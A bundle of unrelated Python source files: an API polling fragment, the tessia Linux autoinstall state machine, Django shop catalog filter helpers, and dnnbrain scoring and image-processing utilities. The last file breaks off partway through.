if no_running_add_schedules(await_completion):
response = api_post_execution(
schedule_id=schedule_id,
data=values
)
if 200 <= response.status_code < 300:
content = json.loads(response.content)
uri = content['execution']['links']['self']
while True:
response = api_get_status(
uri=uri
)
content = json.loads(response.content)
status = content['execution']['status']
if status in ['RUNNING', 'SCHEDULED']:
logging.info("Graph has not completed, entering sleep for 15 seconds")
time.sleep(15)
elif status == 'OK':
logging.info('Graph completed with an OK status')
return status
else:
logging.info('Graph completed with a non-OK status')
raise ValueError(status)
else:
raise ValueError(json.loads(response.content))
else:
logging.info('A schedule execution is already running. Sleeping for 60 seconds.')
time.sleep(60)
|
# Copyright 2016, 2017 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
State machine that performs the installation of Linux Distros.
"""
#
# IMPORTS
#
from socket import gethostbyname
from jsonschema import validate
from tessia.server.db.connection import MANAGER
from tessia.server.lib.post_install import PostInstallChecker
from tessia.server.state_machines.base import BaseMachine
from tessia.server.state_machines.autoinstall.dbcontroller import \
DbController
from tessia.server.state_machines.autoinstall.model import \
AutoinstallMachineModel
from tessia.server.state_machines.autoinstall.plat_lpar import PlatLpar
from tessia.server.state_machines.autoinstall.plat_kvm import PlatKvm
from tessia.server.state_machines.autoinstall.plat_zvm import PlatZvm
from tessia.server.state_machines.autoinstall.sm_anaconda import SmAnaconda
from tessia.server.state_machines.autoinstall.sm_autoyast import SmAutoyast
from tessia.server.state_machines.autoinstall.sm_debian import \
SmDebianInstaller
from tessia.server.state_machines.autoinstall.sm_subiquity import \
SmSubiquityInstaller
from urllib.parse import urlsplit
import ipaddress
import json
import logging
import os
#
# CONSTANTS AND DEFINITIONS
#
MACHINE_DESCRIPTION = 'Autoinstall {} with OS {}'
# directory containing the kernel cmdline templates
CMDLINE_TEMPLATES_DIR = os.path.dirname(
os.path.abspath(__file__)) + "/templates/"
# Schema for the installation request
INSTALL_REQ_PARAMS_SCHEMA = {
"type": "object",
"properties": {
"os": {"type": "string"},
"profile": {"type": "string"},
"template": {"type": "string"},
"repos": {
"type": "array",
"items": {
"type": "string",
},
},
"system": {"type": "string"},
"verbosity": {"type": "string", "enum": list(BaseMachine._LOG_LEVELS)}
},
"required": [
"os",
"system"
],
"additionalProperties": False
}
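# Hedged example (names are made up) of a request string accepted by the schema above:
#   '{"os": "rhel8.4", "system": "lpar01", "profile": "default"}'
# "os" and "system" are required; "profile", "template", "repos" and "verbosity" are optional.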
SUPPORTED_TYPES = {
SmAnaconda.DISTRO_TYPE: SmAnaconda,
SmAutoyast.DISTRO_TYPE: SmAutoyast,
SmDebianInstaller.DISTRO_TYPE: SmDebianInstaller,
SmSubiquityInstaller.DISTRO_TYPE: SmSubiquityInstaller,
}
#
# CODE
#
class AutoInstallMachine(BaseMachine):
"""
Facade to represent the auto install state machine, in fact acts as a proxy
to the real machine since at instantiation time we don't know which distro
is being installed and thus can't determine the right class to use.
"""
def __init__(self, params):
"""
See base class docstring.
Args:
params (str): string representation of JSON object
with schema INSTALL_REQ_PARAMS_SCHEMA
"""
super().__init__(params)
# open the db connection
MANAGER.connect()
parsed = self.parse(params)
self._params = parsed['params']
# apply custom log level if specified
self._log_config(self._params.get('verbosity'))
self._logger = logging.getLogger(__name__)
self._model = self._model_from_params(self._params)
self._machine = self._create_machine()
# __init__()
def _create_platform(self):
"""
Create an instance of machine platform, which is linked to
baselib's hypervisor
"""
hyp_profile_obj = self._model.system_profile.hypervisor
if isinstance(hyp_profile_obj,
AutoinstallMachineModel.HmcHypervisor):
plat_class = PlatLpar
elif isinstance(hyp_profile_obj,
AutoinstallMachineModel.ZvmHypervisor):
plat_class = PlatZvm
elif isinstance(hyp_profile_obj,
AutoinstallMachineModel.KvmHypervisor):
plat_class = PlatKvm
else:
raise RuntimeError('Support for {} is not implemented'.format(
hyp_profile_obj.__class__.__qualname__))
hyp_obj = plat_class.create_hypervisor(self._model)
platform = plat_class(self._model, hyp_obj)
return platform
# _create_platform()
def _create_machine(self):
"""
Create the correct state machine based on the operating system being
installed.
"""
self._model.validate()
# model can accept any OS type, but we have only this many implemented
os_entry = self._model.operating_system
if os_entry.type not in SUPPORTED_TYPES:
raise ValueError("OS type '{}' is not supported for installation"
.format(os_entry.type))
if os_entry.type == 'debian' and os_entry.major >= 2004:
if os_entry.minor == 0 and self._model.ubuntu20_legacy_installer:
self._logger.info("NOTE: tessia_option_installer=legacy"
" is specified in the profile")
self._logger.info("NOTE: please make sure that repo and"
" template are set accordingly")
self._logger.info("NOTE: failure to do so will result in"
" cryptic error messages")
sm_class = SUPPORTED_TYPES[os_entry.type]
else:
sm_class = SmSubiquityInstaller
else:
sm_class = SUPPORTED_TYPES[os_entry.type]
dbctrl = DbController(MANAGER)
platform = self._create_platform()
# PostInstallChecker expects database objects, so we fetch them again
_, profile_obj = dbctrl._get_sysprof_entries(
self._model.system_profile.system_name,
self._model.system_profile.profile_name)
# we pass os_entry, which is compatible to database entry
post_install = PostInstallChecker(profile_obj, os_entry,
permissive=True)
self._logger.debug("Creating machine class %s for %s",
sm_class.__name__, str(os_entry))
machine = sm_class(self._model, platform,
post_install_checker=post_install)
machine.persist_init_data(dbctrl)
return machine
# _create_machine()
@staticmethod
def _filter_os_repos_by_subnet(
os_repos: "list[AutoinstallMachineModel.OsRepository]",
# pylint: disable=line-too-long
subnets: "list[union[ipaddress.IPv4Network,ipaddress.IPv6Network]]"):
"""
From os repos choose those that are in specified subnets
"""
result = []
for os_repo in os_repos:
try:
repo_addr = gethostbyname(
urlsplit(os_repo.url).netloc.rsplit('@', 1)[-1])
address_pyobj = ipaddress.ip_address(repo_addr)
# can't resolve repo's hostname: skip it
except Exception:
continue
if any(address_pyobj in subnet for subnet in subnets):
result.append(os_repo)
return result
# _filter_os_repos_by_subnet()
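# Note on the membership test above: the ipaddress module supports containment checks, e.g.
# ipaddress.ip_address('192.0.2.10') in ipaddress.ip_network('192.0.2.0/24') evaluates to True,
# so a repo is kept only when its resolved address lies inside one of the gateway subnets.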
@staticmethod
def _get_installer_cmdline_template(
os_entry: AutoinstallMachineModel.OperatingSystem):
"""
Retrieve installation kernel command line
"""
# use a corresponding generic template for the OS type
# Note that actual template may be overridden by state machine
template_filename = '{}.cmdline.jinja'.format(os_entry.type)
with open(CMDLINE_TEMPLATES_DIR + template_filename,
"r") as template_file:
template_content = template_file.read()
return AutoinstallMachineModel.Template(template_filename,
template_content)
# _get_installer_cmdline_template()
def _model_from_params(self, params):
"""
Create model from machine params
"""
# we can use static class, not an instance,
# because instance only makes sure database is connected
dbctrl = DbController(MANAGER)
os_entry, os_repos = dbctrl.get_os(params['os'])
if 'template' in params:
template_entry = dbctrl.get_template(params['template'])
elif os_entry.template_name:
template_entry = dbctrl.get_template(os_entry.template_name)
else:
raise ValueError("No installation template for OS '{}' specified"
.format(os_entry.name))
# get installer template
installer_template = self._get_installer_cmdline_template(os_entry)
system_model = dbctrl.get_system(params['system'],
params.get("profile"))
# from all the os repos choose those that can be accessed
# via a gateway interface defined on the system
gateway_subnets = [network.subnet for network in
system_model.list_gateway_networks()]
accessible_os_repos = self._filter_os_repos_by_subnet(
os_repos, gateway_subnets)
if not accessible_os_repos:
# fallback if no "better" repo was found
accessible_os_repos = os_repos
custom_os_repos, custom_package_repos = dbctrl.get_custom_repos(
params.get('repos', []))
install_opts = dbctrl.get_install_opts(params['system'],
params.get("profile"))
model = AutoinstallMachineModel(os_entry, accessible_os_repos,
template_entry, installer_template,
custom_os_repos, custom_package_repos,
system_model, install_opts)
return model
# _model_from_params()
def cleanup(self):
"""
Proxy the call to the real machine to perform cleanup.
"""
# When the job is canceled during a cleanup the routine
# is not executed again by the scheduler.
self.cleaning_up = True
self._logger.info("AutoInstall cleanup is running")
return self._machine.cleanup()
# cleanup()
@classmethod
def parse(cls, params):
"""
Args:
params(str): A string containing a json in the format defined by
the INSTALL_REQ_PARAMS_SCHEMA variable.
Returns:
dict: Resources allocated for the installation
Has "resources" and "description" entries
(to be consumed by the scheduler)
and "params" as an object conforming to the schema
Raises:
SyntaxError: if content is in wrong format.
ValueError: if certain properties are not defined.
"""
try:
params = json.loads(params)
validate(params, INSTALL_REQ_PARAMS_SCHEMA)
except Exception as exc:
raise SyntaxError("Invalid request parameters") from exc
# make a few requests to get necessary parameters
dbctrl = DbController(MANAGER)
# check which format the profile parameter is using
system, _ = dbctrl._get_sysprof_entries(params['system'], None)
os_entry, _ = dbctrl.get_os(params['os'])
result = {
'resources': {'shared': [], 'exclusive': []},
'description': MACHINE_DESCRIPTION.format(
system.name, os_entry.name),
'params': params
}
# the system being installed is considered an exclusive resource
result['resources']['exclusive'].append(system.name)
system = system.hypervisor_rel
# the nested hypervisor hierarchy is considered a shared resource
while system is not None:
result.get("resources").get("shared").append(system.name)
system = system.hypervisor_rel
# check required FCP parameters- use schema to validate specs field
# -- should be checked in API instead
# in case the system profile has no hypervisor profile defined the
# machine's constructor will use the hypervisor's default profile,
# therefore there is no need to check it here.
return result
# parse()
def start(self):
"""
Proxy the call to the real machine to start execution.
"""
try:
self._machine.start()
except:
DbController(MANAGER).clear_target_os_field(self._model)
raise
# if we got here, machine executed successfully
# update OS field on the target system
DbController(MANAGER).set_target_os_field(self._model)
# To make sure the cleaning_up variable is set correctly,
# run the cleanup here.
self.cleanup()
return 0
# start()
# AutoInstallMachine
|
import locale
# django imports
from django.conf import settings
from django.core.cache import cache
from django.db import connection
from django.core.exceptions import FieldError
from django.db.models import Q, Count, Min, Max
# import lfs
import lfs.catalog.models
from lfs.catalog.settings import CONFIGURABLE_PRODUCT
from lfs.catalog.settings import STANDARD_PRODUCT
from lfs.catalog.settings import PRODUCT_WITH_VARIANTS
from lfs.catalog.settings import PROPERTY_VALUE_TYPE_FILTER
# Load logger
import logging
from lfs.manufacturer.models import Manufacturer
logger = logging.getLogger("default")
# TODO: Add unit test
def get_current_top_category(request, obj):
"""
Returns the current top category of a product.
"""
if obj.__class__.__name__.lower() == "product":
category = obj.get_current_category(request)
else:
category = obj
if category is None:
return category
while category.parent is not None:
category = category.parent
return category
def get_price_filters(category, product_filter, price_filter, manufacturer_filter):
""" Creates price filter based on the min and max prices of the category's
products
"""
# If a price filter is set we return just this.
if price_filter:
return {
"show_reset": True,
"min": locale.format("%.2f", price_filter["min"]),
"max": locale.format("%.2f", price_filter["max"]),
"disabled": False,
}
# Base are the filtered products
products = get_filtered_products_for_category(category, product_filter, price_filter, None, manufacturer_filter)
if not products:
return []
all_products = lfs.catalog.models.Product.objects.filter(Q(pk__in=products) | (Q(parent__in=products) & Q(active=True)))
res = all_products.aggregate(min_price=Min('effective_price'), max_price=Max('effective_price'))
pmin, pmax = res['min_price'], res['max_price']
disabled = (pmin and pmax) is None
try:
pmin = locale.format("%.2f", pmin)
except TypeError:
pmin = 0.0
try:
pmax = locale.format("%.2f", pmax)
except TypeError:
pmax = 0.0
return {
"show_reset": False,
"min": pmin,
"max": pmax,
"disabled": disabled,
}
def get_manufacturer_filters(category, product_filter, price_filter, manufacturer_filter):
"""Creates manufacturer filter links based on the manufacturers bound to the products in category
"""
# Base are the filtered products
products = get_filtered_products_for_category(category, product_filter, price_filter, None, None)
if not products:
return []
all_products = lfs.catalog.models.Product.objects.filter(Q(pk__in=products) | (Q(parent__in=products) & Q(active=True)))
# And their parents
# product_ids = []
# for product in products:
# if product.parent:
# product_ids.append(product.parent_id)
# else:
# product_ids.append(product.pk)
out = {"show_reset": False}
if manufacturer_filter:
out = {
"show_reset": True
}
else:
manufacturer_filter = []
qs = Manufacturer.objects.filter(products__in=all_products).annotate(products_count=Count('products'))
out['items'] = [{'obj': obj, 'selected': obj.pk in manufacturer_filter} for obj in qs]
return out
def get_product_filters(category, product_filter, price_filter, manufacturer_filter, sorting):
"""Returns the next product filters based on products which are in the given
category and within the result set of the current filters.
"""
properties_mapping = get_property_mapping()
options_mapping = get_option_mapping()
property_ids = _get_property_ids()
product_ids = _get_product_ids(category)
set_filters = dict(product_filter)
########## Number Fields ###################################################
number_fields = []
cursor = connection.cursor()
cursor.execute("""SELECT property_id, min(value_as_float), max(value_as_float)
FROM catalog_productpropertyvalue
WHERE type=%s
AND product_id IN (%s)
AND property_id IN (%s)
GROUP BY property_id""" % (PROPERTY_VALUE_TYPE_FILTER, product_ids, property_ids))
for row in cursor.fetchall():
prop = properties_mapping[row[0]]
if prop.is_select_field or prop.is_text_field or not prop.filterable:
continue
if product_filter.get("number-filter", {}).get(str(prop.id)):
pmin, pmax = product_filter.get("number-filter").get(str(prop.id))[0:2]
show_reset = True
else:
pmin, pmax = row[1:3]
show_reset = False
try:
pmin = locale.format("%.2f", float(pmin))
except TypeError:
pmin = 0.0
try:
pmax = locale.format("%.2f", float(pmax))
except TypeError:
pmax = 0.0
number_fields.append({
"id": row[0],
"position": prop.position,
"object": prop,
"name": prop.name,
"title": prop.title,
"unit": prop.unit,
"show_reset": show_reset,
"show_quantity": True,
"items": {"min": pmin, "max": pmax},
})
########## Select Fields & Text Fields #####################################
result = []
cursor = connection.cursor()
cursor.execute("""SELECT property_id, value
FROM catalog_productpropertyvalue
WHERE type=%s
AND product_id IN (%s)
AND property_id IN (%s)
GROUP BY property_id, value""" % (PROPERTY_VALUE_TYPE_FILTER, product_ids, property_ids))
properties = {}
for row in cursor.fetchall():
prop = properties_mapping[row[0]]
if prop.is_number_field or not prop.filterable:
continue
if prop.is_select_field:
name = options_mapping[row[1]].name
position = options_mapping[row[1]].position
else:
name = row[1]
position = 10
if name == row[1] and name == '':
continue
if row[0] not in properties:
properties[row[0]] = []
properties[row[0]].append({
"id": row[0],
"value": row[1],
"name": name,
"title": prop.title,
"position": position,
"show_quantity": True,
})
# Creates the filters to count the existing products per property option,
# which is used within the filter portlet
new_product_filter = {}
if product_filter.get("number-filter"):
new_product_filter["number-filter"] = product_filter["number-filter"]
for prop, options in properties.items():
for option in options:
# The option in question is used at any rate
new_product_filter["select-filter"] = {str(prop): option["value"]}
# All checked options of all other properties are also used
for f0, f1 in product_filter.get("select-filter", {}).items():
if f0 != str(prop):
new_product_filter["select-filter"][f0] = f1
# Tests if the option is checked
if (f0 == str(prop)) and (option["value"] in f1.split("|")):
option["checked"] = True
option["quantity"] = len(get_filtered_products_for_category(category, new_product_filter, price_filter, None))
# Transform the group properties into a list of dicts
for property_id, items in properties.items():
prop = properties_mapping[property_id]
items.sort(key=lambda a: a["position"])
# Move items with zero quantity to the end of the list
for x in range(0, len(items)):
if items[x]["quantity"] == 0:
items.insert(len(items), items.pop(x))
result.append({
"id": property_id,
"position": prop.position,
"unit": prop.unit,
"show_reset": str(property_id) in set_filters.get('select-filter', {}).keys(),
"name": prop.name,
"title": prop.title,
"items": items,
})
result.sort(key=lambda a: a["position"])
return {
"select_fields": result,
"number_fields": number_fields,
}
def _get_property_ids():
property_ids = lfs.catalog.models.ProductPropertyValue.objects.distinct().values_list('property_id', flat=True)
return ", ".join(map(str, property_ids))
def _get_product_ids(category):
products = category.get_all_products()
if not products:
return []
all_products = lfs.catalog.models.Product.objects.filter(Q(pk__in=products) | (Q(parent__in=products) & Q(active=True)))
product_ids = all_products.values_list('id', flat=True)
return ", ".join(map(str, product_ids))
# TODO: Implement this as a method of Category
def get_filtered_products_for_category(category, filters, price_filter, sorting, manufacturers_filter=None):
"""Returns products for given categories and current filters sorted by
current sorting.
"""
from lfs.catalog.models import Product, ProductPropertyValue
if filters:
if category.show_all_products:
products = category.get_all_products()
else:
products = category.get_products()
# All variants of category products
all_variants = Product.objects.filter(parent__in=products)
# Generate filter
filters_query = Q()
for prop, value in filters.get("select-filter", {}).items():
if value.find("|") == -1:
q = Q(property_id=prop, value=value)
else:
options = []
q_options = Q()
for option in value.split("|"):
q_options |= Q(value=option)
q = Q(property_id=prop) & q_options
filters_query |= q
for prop, values in filters.get("number-filter", {}).items():
q = Q(property_id=prop, value_as_float__range=(values[0], values[1]))
filters_query |= q
# The idea behind SQL query generated below is: If for every filter (property=value) for a product id exists
# a "product property value" the product matches.
#
# Example ValuesListQuerySet built by statements below is:
#
# ProductPropertyValue.objects.filter(Q(property_id=1, value='1') | Q(property_id=2, value='1'),
# product__in=products,
# type=PROPERTY_VALUE_TYPE_FILTER) \
# .values('product_id') \
# .annotate(cnt=Count('id')).filter(cnt=2).values_list('product_id', flat=True)
#
# it evaluates to:
#
# SELECT "catalog_productpropertyvalue"."product_id"
# FROM "catalog_productpropertyvalue"
# WHERE ((
# ("catalog_productpropertyvalue"."value" = 1 AND "catalog_productpropertyvalue"."property_id" = 1 )
# OR
# ("catalog_productpropertyvalue"."value" = 1 AND "catalog_productpropertyvalue"."property_id" = 2 )
# )
# AND "catalog_productpropertyvalue"."type" = 0
# AND "catalog_productpropertyvalue"."product_id" IN (SELECT U0."id"
# FROM "catalog_product" U0
# WHERE U0."name" LIKE %da% ESCAPE '\' ))
# GROUP BY "catalog_productpropertyvalue"."product_id"
# HAVING COUNT("catalog_productpropertyvalue"."id") = 2
length = len(filters.get("select-filter", {}).items()) + len(filters.get("number-filter", {}).items())
# PRODUCTS - get all products with matching filters.
matching_product_ids = ProductPropertyValue.objects.filter(product__in=products,
type=PROPERTY_VALUE_TYPE_FILTER)
if filters_query is not None:
matching_product_ids = matching_product_ids.filter(filters_query)
matching_product_ids = matching_product_ids.values('product_id').annotate(cnt=Count('id')) \
.filter(cnt=length).values_list('product_id', flat=True)
# VARIANTS - get matching variants and then their parents as we're interested in products with variants,
# not variants itself
matching_variant_ids = ProductPropertyValue.objects.filter(product__in=all_variants,
type=PROPERTY_VALUE_TYPE_FILTER)
if filters_query is not None:
matching_variant_ids = matching_variant_ids.filter(filters_query)
matching_variant_ids = matching_variant_ids.values('product_id').annotate(cnt=Count('id')) \
.filter(cnt=length).values_list('product_id', flat=True)
variant_products = Product.objects.filter(pk__in=matching_variant_ids)
# Merge results
products = Product.objects.filter(Q(pk__in=matching_product_ids) |
Q(pk__in=variant_products.values_list('parent_id', flat=True))).distinct()
else:
categories = [category]
if category.show_all_products:
categories.extend(category.get_all_children())
products = lfs.catalog.models.Product.objects.filter(
active=True,
categories__in=categories,
sub_type__in=[STANDARD_PRODUCT, PRODUCT_WITH_VARIANTS, CONFIGURABLE_PRODUCT]).distinct()
# TODO: It might be more effective to move price filters directly into if/else clause above
if price_filter:
# Get all variants of the products
variants = lfs.catalog.models.Product.objects.filter(parent__in=products, active=True)
# Filter the variants by price
variants = variants.filter(effective_price__range=[price_filter["min"],
price_filter["max"]])
# Filter the products
filtered_products = products.filter(effective_price__range=[price_filter["min"],
price_filter["max"]], active=True)
# merge the result and get a new query set of all products
# We get the parent ids of the variants as the "product with variants"
# should be displayed and not the variants.
products = lfs.catalog.models.Product.objects.filter(
Q(pk__in=filtered_products) | Q(pk__in=variants.values_list('parent_id', flat=True)))
if manufacturers_filter:
# Get all variants of the products
variants = lfs.catalog.models.Product.objects.filter(parent__in=products)
# Filter the variants by manufacturer
variants = variants.filter(manufacturer__in=manufacturers_filter)
# Filter the products
filtered_products = products.filter(manufacturer__in=manufacturers_filter)
# merge the result and get a new query set of all products
# We get the parent ids of the variants as the "product with variants"
# should be displayed and not the variants.
products = lfs.catalog.models.Product.objects.filter(
Q(pk__in=filtered_products) | Q(pk__in=variants.values_list('parent_id', flat=True)))
if sorting:
try:
products = products.order_by(sorting)
except FieldError:
# ignore invalid sort order which may be stored in the session
pass
return products
def get_option_mapping():
"""Returns a dictionary with option id to property name.
"""
options = {}
for option in lfs.catalog.models.PropertyOption.objects.all():
options[str(option.id)] = option
return options
def get_property_mapping():
"""Returns a dictionary with property id to property name.
"""
properties = {}
for property in lfs.catalog.models.Property.objects.all():
properties[property.id] = property
return properties
def _calculate_steps(product_ids, property, min, max):
"""Calculates filter steps.
**Parameters**
product_ids
The product_ids for which the steps are calculated. List of ids.
property
The property for which the steps are calculated. Instance of Property.
min / max
The min and max value of all steps. Must be a Float.
"""
try:
min = float(min)
max = float(max)
except TypeError:
return []
result = []
filter_steps = lfs.catalog.models.FilterStep.objects.filter(property=property.id)
if property.is_steps_step_type:
for i, step in enumerate(filter_steps[:len(filter_steps) - 1]):
min = step.start
if i != 0:
min += 1.0
max = filter_steps[i + 1].start
result.append({
"min": min,
"max": max,
"quantity": _calculate_quantity(product_ids, property.id, min, max)
})
else:
if property.is_automatic_step_type:
if max == min:
step = max
else:
diff = max - min
step = diff / 3 # TODO: Should this be variable?
if step >= 0 and step < 2:
step = 1
elif step >= 2 and step < 6:
step = 5
elif step >= 6 and step < 11:
step = 10
elif step >= 11 and step < 51:
step = 50
elif step >= 51 and step < 101:
step = 100
elif step >= 101 and step < 501:
step = 500
elif step >= 501 and step < 1001:
step = 1000
elif step >= 1000 and step < 5001:
step = 500
elif step >= 5001 and step < 10001:
step = 1000
else:
step = property.step
for n, i in enumerate(range(0, int(max), step)):
if i > max:
break
min = i + 1
max = i + step
result.append({
"min": min,
"max": max,
"quantity": _calculate_quantity(product_ids, property.id, min, max),
})
if property.display_no_results:
return result
else:
# Remove entries with zero products
new_result = []
for n, f in enumerate(result):
if f["quantity"] == 0:
try:
result[n + 1]["min"] = f["min"]
except IndexError:
pass
continue
new_result.append(f)
return new_result
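# Illustrative note (not from the original source): _calculate_steps returns a list of
# dicts, one per step. For an automatic-step property with min=1 and max=30 the layout
# would be
#   [{"min": 1, "max": 10, "quantity": ...},
#    {"min": 11, "max": 20, "quantity": ...},
#    {"min": 21, "max": 30, "quantity": ...}]
# where each "quantity" is computed by _calculate_quantity below and steps with zero
# products are dropped unless property.display_no_results is set.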
def _calculate_quantity(product_ids, property_id, min, max):
"""Calculate the amount of products for given parameters.
"""
# Count entries for current filter
cursor = connection.cursor()
cursor.execute("""SELECT property_id, value, parent_id
FROM catalog_productpropertyvalue
WHERE product_id IN (%s)
AND property_id = %s
AND value_as_float BETWEEN %s AND %s""" % (product_ids, property_id, min, max))
already_count = {}
amount = 0
for row in cursor.fetchall():
# We count a property/value pair just one time per *product*. For
# "products with variants" this could be stored several times within the
# catalog_productpropertyvalue. Imagine a variant with two properties
# color and size:
# v1 = color:red / size: s
# v2 = color:red / size: l
        # But we want to count color:red just one time, as the product with
        # variants is displayed and not the variants.
if "%s%s%s" % (row[2], row[0], row[1]) in already_count:
continue
already_count["%s%s%s" % (row[2], row[0], row[1])] = 1
amount += 1
return amount
|
import os
import cv2
import copy
import time
import torch
import numpy as np
from PIL import Image
from os.path import join as pjoin
from copy import deepcopy
from sklearn.decomposition import PCA
from sklearn.linear_model import LinearRegression, LogisticRegression, Lasso
from sklearn.svm import SVC
from sklearn.model_selection import StratifiedKFold, KFold, cross_val_score
from sklearn.metrics import pairwise_distances, confusion_matrix
from sklearn.metrics import r2_score, explained_variance_score
from scipy.signal import periodogram
from scipy.stats import pearsonr
from torchvision import transforms
DNNBRAIN_MODEL = pjoin(os.environ['DNNBRAIN_DATA'], 'models')
def correlation_score(y_true, y_pred, multioutput='uniform_average'):
"""
Parameters
----------
y_true : ndarray with shape as (n_samples,) or (n_samples, n_outputs)
Ground truth target values.
y_pred : ndarray with shape as (n_samples,) or (n_samples, n_outputs)
Estimated target values.
multioutput : string in ['raw_values', 'uniform_average']
'raw_values' :
Returns a full set of scores in case of multioutput input.
'uniform_average' :
Scores of all outputs are averaged with uniform weight.
Returns
-------
score : float or ndarray of floats
a single value if 'multioutput' is 'uniform_average'
        an ndarray if 'multioutput' is 'raw_values'
"""
# check y
if y_true.ndim == 1:
y_true = y_true[:, None]
elif y_true.ndim == 2:
pass
else:
raise ValueError("y_true is a ndarray with shape as (n_samples,) or "
"(n_samples, n_outputs)")
if y_pred.ndim == 1:
y_pred = y_pred[:, None]
elif y_pred.ndim == 2:
pass
else:
raise ValueError("y_pred is a ndarray with shape as (n_samples,) or "
"(n_samples, n_outputs)")
assert y_true.shape == y_pred.shape
# scoring
n_output = y_true.shape[1]
score = np.zeros(n_output)
for output_idx in range(n_output):
score[output_idx] = pearsonr(y_true[:, output_idx], y_pred[:, output_idx])[0]
if multioutput == 'raw_values':
pass
elif multioutput == 'uniform_average':
score = np.mean(score)
else:
raise ValueError("Not supported multioutput: {}".format(multioutput))
return score
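# A minimal usage sketch (illustrative, not part of the original module):
# >>> y_true = np.array([[1., 2.], [2., 4.], [3., 6.]])
# >>> y_pred = 2.0 * y_true + 1.0      # perfectly linearly related predictions
# >>> correlation_score(y_true, y_pred, multioutput='raw_values')
# array([1., 1.])    (up to floating point rounding)
# >>> correlation_score(y_true, y_pred)    # 'uniform_average': mean over outputs
# 1.0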
def correlation_scorer(regressor, X, y):
y_preds = regressor.predict(X)
return pearsonr(y, y_preds)[0]
def normalize(array):
"""
Normalize an array's value domain to [0, 1]
    Note: the original normalize function is at dnnbrain/utils/util.py,
    but 'from dnnbrain.dnn.core import Mask' in that file causes import conflicts.
    Fix the conflicts in the future.
    Parameters
    ----------
    array : ndarray
        A numpy array to be normalized.
Return
------
array : ndarray
A numpy array after normalization.
"""
array = (array - array.min()) / (array.max() - array.min())
return array
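# Illustrative example (not part of the original module):
# >>> normalize(np.array([0., 5., 10.]))
# array([0. , 0.5, 1. ])
# Note that a constant array would trigger a zero division (NaNs) here, since max == min.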
def array_statistic(arr, method, axis=None, keepdims=False):
"""
    Extract a statistic of an array.
Parameters
----------
arr : ndarray
A numpy array.
method : str
Feature extraction method
axis : int, tuple
None or int or tuple of ints.
Axis or axes along which to operate.
If it's None, operate on the whole array.
keepdims : bool
Keep the axis which is reduced.
Return
------
arr : ndarray
Extracted statistic.
"""
if method == 'max':
arr = np.max(arr, axis, keepdims=keepdims)
elif method == 'mean':
arr = np.mean(arr, axis, keepdims=keepdims)
elif method == 'median':
arr = np.median(arr, axis, keepdims=keepdims)
elif method == 'L1':
arr = np.linalg.norm(arr, 1, axis, keepdims=keepdims)
elif method == 'L2':
arr = np.linalg.norm(arr, 2, axis, keepdims=keepdims)
else:
raise ValueError('Not supported method:', method)
return arr
class ImageProcessor:
"""
Metrics for pre-processing pictures to further DNN operations.
"""
def __init__(self):
self.str2pil_interp = {
'nearest': Image.NEAREST,
'bilinear': Image.BILINEAR,
'bicubic': Image.BICUBIC,
'lanczos': Image.LANCZOS
}
self.str2cv2_interp = {
'nearest': cv2.INTER_NEAREST,
'bilinear': cv2.INTER_LINEAR,
'bicubic': cv2.INTER_CUBIC,
'lanczos': cv2.INTER_LANCZOS4
}
def _check_image(self, image):
"""
Check if the image is valid.
        Parameters
        ----------
        image : ndarray, Tensor, PIL.Image
            Image data.
            If it is an ndarray or Tensor, its shape must be (height, width) or (3, height, width).
"""
if isinstance(image, (np.ndarray, torch.Tensor)):
if image.ndim == 2:
pass
elif image.ndim == 3:
assert image.shape[0] == 3, "RGB channel must be the first axis."
else:
raise ValueError("Only two shapes are valid: "
"(height, width) and (3, height, width)")
elif isinstance(image, Image.Image):
pass
else:
raise TypeError("Only support three types of image: "
"ndarray, Tensor and PIL.Image.")
def to_array(self, image):
"""
Convert image to array.
Parameters
----------
image : ndarray, Tensor, PIL.Image
Image data.
Return
-------
arr : ndarray
Image array.
"""
self._check_image(image)
if isinstance(image, np.ndarray):
arr = image
elif isinstance(image, torch.Tensor):
arr = image.numpy()
else:
arr = np.asarray(image)
if arr.ndim == 3:
arr = arr.transpose((2, 0, 1))
elif arr.ndim == 2:
pass
else:
raise ValueError(f"Unsupported number of image dimensions: {arr.ndim}!")
return arr
def to_tensor(self, image):
"""
Convert image to tensor
        Parameters
        ----------
image : ndarray, Tensor, PIL.Image
Image data.
Return
------
tensor: Tensor
Image tensor.
"""
self._check_image(image)
if isinstance(image, np.ndarray):
tensor = torch.from_numpy(image)
elif isinstance(image, torch.Tensor):
tensor = image
else:
tensor = torch.from_numpy(self.to_array(image))
return tensor
def to_pil(self, image, normalization=False):
"""
Convert image to PIL.Image
Parameters
----------
image : ndarray, Tensor, PIL.Image
Image data.
normalization : bool
Normalization operation.
If is **True**, normalize image data to integers in [0, 255].
Return
------
image : PIL.Image
Output image with type of PIL.Image.
"""
self._check_image(image)
if normalization:
image = normalize(self.to_array(image)) * 255
image = image.astype(np.uint8)
if isinstance(image, torch.Tensor):
image = image.numpy()
if isinstance(image, np.ndarray):
if image.ndim == 3:
image = image.transpose((1, 2, 0))
image = Image.fromarray(image)
return image
def resize(self, image, size, interpolation='nearest'):
"""
Resize image.
Parameters
----------
image : ndarray, Tensor, PIL.Image
Image data.
size : tuple
The target size as a 2-tuple: (height, width).
interpolation : str
Interpolation method for resize,
check *self.str2pil_interp* and *self.str2cv2_interp* to
find the available interpolation.
Return
------
image : ndarray, Tensor, PIL.Image
Image data after resizing.
"""
self._check_image(image)
size = size[::-1]
if isinstance(image, Image.Image):
image = image.resize(size, self.str2pil_interp[interpolation])
elif isinstance(image, np.ndarray):
if image.ndim == 2:
image = cv2.resize(image, size,
interpolation=self.str2cv2_interp[interpolation])
else:
image = cv2.resize(image.transpose((1, 2, 0)), size,
interpolation=self.str2cv2_interp[interpolation])
image = image.transpose((2, 0, 1))
else:
image = image.numpy()
if image.ndim == 2:
image = cv2.resize(image, size,
interpolation=self.str2cv2_interp[interpolation])
else:
image = cv2.resize(image.transpose((1, 2, 0)), size,
interpolation=self.str2cv2_interp[interpolation])
image = image.transpose((2, 0, 1))
image = torch.from_numpy(image)
return image
def crop(self, image, box):
"""
Crop image with a rectangular region.
Parameters
----------
image : ndarray, Tensor, PIL.Image
Image data.
box : tuple
The crop rectangle as a (left, upper, right, lower)-tuple.
Return
------
